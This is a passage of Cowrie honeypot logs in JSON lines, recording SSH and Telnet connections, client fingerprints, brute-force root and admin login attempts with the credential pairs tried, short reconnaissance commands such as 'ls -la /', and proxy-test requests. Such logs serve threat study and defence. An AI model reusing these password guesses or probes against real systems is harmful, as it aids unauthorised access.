"diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T17:31:55.657740Z","src_ip":"212.227.125.160","session":"847c73118ee2"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T17:31:56.647242Z","src_ip":"212.227.125.160","session":"847c73118ee2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:31:56.649044Z","src_ip":"212.227.125.160","session":"847c73118ee2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55006,"dst_ip":"1.2.3.4","dst_port":22,"session":"f99fb840a2fa","protocol":"ssh","message":"New connection: 212.227.235.229:55006 (1.2.3.4:22) [session: f99fb840a2fa]","sensor":"my-vps","timestamp":"2025-08-26T17:33:26.106280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:33:26.745918Z","src_ip":"212.227.235.229","session":"f99fb840a2fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:33:26.746732Z","src_ip":"212.227.235.229","session":"f99fb840a2fa"}
{"eventid":"cowrie.login.success","username":"root","password":"Nehal@123","message":"login attempt [root/Nehal@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:33:30.397810Z","src_ip":"212.227.235.229","session":"f99fb840a2fa"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:33:31.098887Z","src_ip":"212.227.235.229","session":"f99fb840a2fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59992,"dst_ip":"1.2.3.4","dst_port":23,"session":"abe697ca6cd4","protocol":"telnet","message":"New connection: 212.227.235.229:59992 (1.2.3.4:23) [session: abe697ca6cd4]","sensor":"my-vps","timestamp":"2025-08-26T17:35:04.253614Z"}
{"eventid":"cowrie.session.closed","duration":12.417397499084473,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:35:16.670935Z","src_ip":"212.227.235.229","session":"abe697ca6cd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47011,"dst_ip":"1.2.3.4","dst_port":23,"session":"2e47088e0f9a","protocol":"telnet","message":"New connection: 212.227.125.160:47011 (1.2.3.4:23) [session: 2e47088e0f9a]","sensor":"my-vps","timestamp":"2025-08-26T17:35:44.347540Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49458,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e229b9ee59f","protocol":"ssh","message":"New connection: 212.227.235.229:49458 (1.2.3.4:22) [session: 4e229b9ee59f]","sensor":"my-vps","timestamp":"2025-08-26T17:35:53.270068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:35:53.271449Z","src_ip":"212.227.235.229","session":"4e229b9ee59f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:35:53.428019Z","src_ip":"212.227.235.229","session":"4e229b9ee59f"}
{"eventid":"cowrie.login.success","username":"root","password":"@combo21","message":"login attempt [root/@combo21] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:35:54.060431Z","src_ip":"212.227.235.229","session":"4e229b9ee59f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:35:54.399561Z","src_ip":"212.227.235.229","session":"4e229b9ee59f"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-26T17:35:54.400285Z","src_ip":"212.227.235.229","session":"4e229b9ee59f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:35:54.559943Z","src_ip":"212.227.235.229","session":"4e229b9ee59f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:35:54.561089Z","src_ip":"212.227.235.229","session":"4e229b9ee59f"}
{"eventid":"cowrie.session.closed","duration":13.459497451782227,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:35:57.806924Z","src_ip":"212.227.125.160","session":"2e47088e0f9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecb5179f6cd7","protocol":"ssh","message":"New connection: 212.227.235.229:6102 (1.2.3.4:22) [session: ecb5179f6cd7]","sensor":"my-vps","timestamp":"2025-08-26T17:36:07.168570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T17:36:07.265436Z","src_ip":"212.227.235.229","session":"ecb5179f6cd7"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T17:36:07.361617Z","src_ip":"212.227.235.229","session":"ecb5179f6cd7"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T17:36:07.455292Z","src_ip":"212.227.235.229","session":"ecb5179f6cd7"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:36:07.456673Z","src_ip":"212.227.235.229","session":"ecb5179f6cd7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55134,"dst_ip":"1.2.3.4","dst_port":22,"session":"5707ee331d29","protocol":"ssh","message":"New connection: 217.72.205.35:55134 (1.2.3.4:22) [session: 5707ee331d29]","sensor":"my-vps","timestamp":"2025-08-26T17:38:25.278913Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:38:25.280148Z","src_ip":"217.72.205.35","session":"5707ee331d29"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":49542,"dst_ip":"1.2.3.4","dst_port":22,"session":"eef85d30819e","protocol":"ssh","message":"New connection: 213.108.243.7:49542 (1.2.3.4:22) [session: eef85d30819e]","sensor":"my-vps","timestamp":"2025-08-26T17:39:03.424861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:39:03.428652Z","src_ip":"213.108.243.7","session":"eef85d30819e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:39:03.517767Z","src_ip":"213.108.243.7","session":"eef85d30819e"}
{"eventid":"cowrie.login.success","username":"root","password":"@combo21","message":"login attempt [root/@combo21] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:39:04.117975Z","src_ip":"213.108.243.7","session":"eef85d30819e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:39:04.427327Z","src_ip":"213.108.243.7","session":"eef85d30819e"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T17:39:04.428018Z","src_ip":"213.108.243.7","session":"eef85d30819e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:39:04.551181Z","src_ip":"213.108.243.7","session":"eef85d30819e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:39:04.574271Z","src_ip":"213.108.243.7","session":"eef85d30819e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51927,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a0b53736dd6","protocol":"ssh","message":"New connection: 213.209.150.239:51927 (1.2.3.4:22) [session: 5a0b53736dd6]","sensor":"my-vps","timestamp":"2025-08-26T17:39:16.669820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T17:39:16.670558Z","src_ip":"213.209.150.239","session":"5a0b53736dd6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T17:39:16.727356Z","src_ip":"213.209.150.239","session":"5a0b53736dd6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:39:17.010441Z","src_ip":"213.209.150.239","session":"5a0b53736dd6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":5793,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:5793","sensor":"my-vps","timestamp":"2025-08-26T17:39:17.068343Z","session":"5a0b53736dd6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:39:17.124979Z","src_ip":"213.209.150.239","session":"5a0b53736dd6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":20384,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20384","sensor":"my-vps","timestamp":"2025-08-26T17:39:17.278949Z","session":"5a0b53736dd6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:39:17.335840Z","src_ip":"213.209.150.239","session":"5a0b53736dd6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:39:17.393359Z","src_ip":"213.209.150.239","session":"5a0b53736dd6"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":60128,"dst_ip":"1.2.3.4","dst_port":22,"session":"1658a9067e16","protocol":"ssh","message":"New connection: 80.94.95.112:60128 (1.2.3.4:22) [session: 1658a9067e16]","sensor":"my-vps","timestamp":"2025-08-26T17:39:37.237906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T17:39:37.238931Z","src_ip":"80.94.95.112","session":"1658a9067e16"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T17:39:37.269289Z","src_ip":"80.94.95.112","session":"1658a9067e16"}
{"eventid":"cowrie.login.failed","username":"admin","password":"puma","message":"login attempt [admin/puma] failed","sensor":"my-vps","timestamp":"2025-08-26T17:39:37.475394Z","src_ip":"80.94.95.112","session":"1658a9067e16"}
{"eventid":"cowrie.login.failed","username":"admin","password":"princ","message":"login attempt [admin/princ] failed","sensor":"my-vps","timestamp":"2025-08-26T17:39:38.507437Z","src_ip":"80.94.95.112","session":"1658a9067e16"}
{"eventid":"cowrie.login.failed","username":"admin","password":"premiere","message":"login attempt [admin/premiere] failed","sensor":"my-vps","timestamp":"2025-08-26T17:39:39.541294Z","src_ip":"80.94.95.112","session":"1658a9067e16"}
{"eventid":"cowrie.login.failed","username":"admin","password":"porshe","message":"login attempt [admin/porshe] failed","sensor":"my-vps","timestamp":"2025-08-26T17:39:40.574830Z","src_ip":"80.94.95.112","session":"1658a9067e16"}
{"eventid":"cowrie.login.failed","username":"admin","password":"poi098","message":"login attempt [admin/poi098] failed","sensor":"my-vps","timestamp":"2025-08-26T17:39:41.607356Z","src_ip":"80.94.95.112","session":"1658a9067e16"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:39:42.641609Z","src_ip":"80.94.95.112","session":"1658a9067e16"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":41118,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ba52371f501","protocol":"ssh","message":"New connection: 45.88.8.186:41118 (1.2.3.4:22) [session: 1ba52371f501]","sensor":"my-vps","timestamp":"2025-08-26T17:39:50.313707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:39:51.050109Z","src_ip":"45.88.8.186","session":"1ba52371f501"}
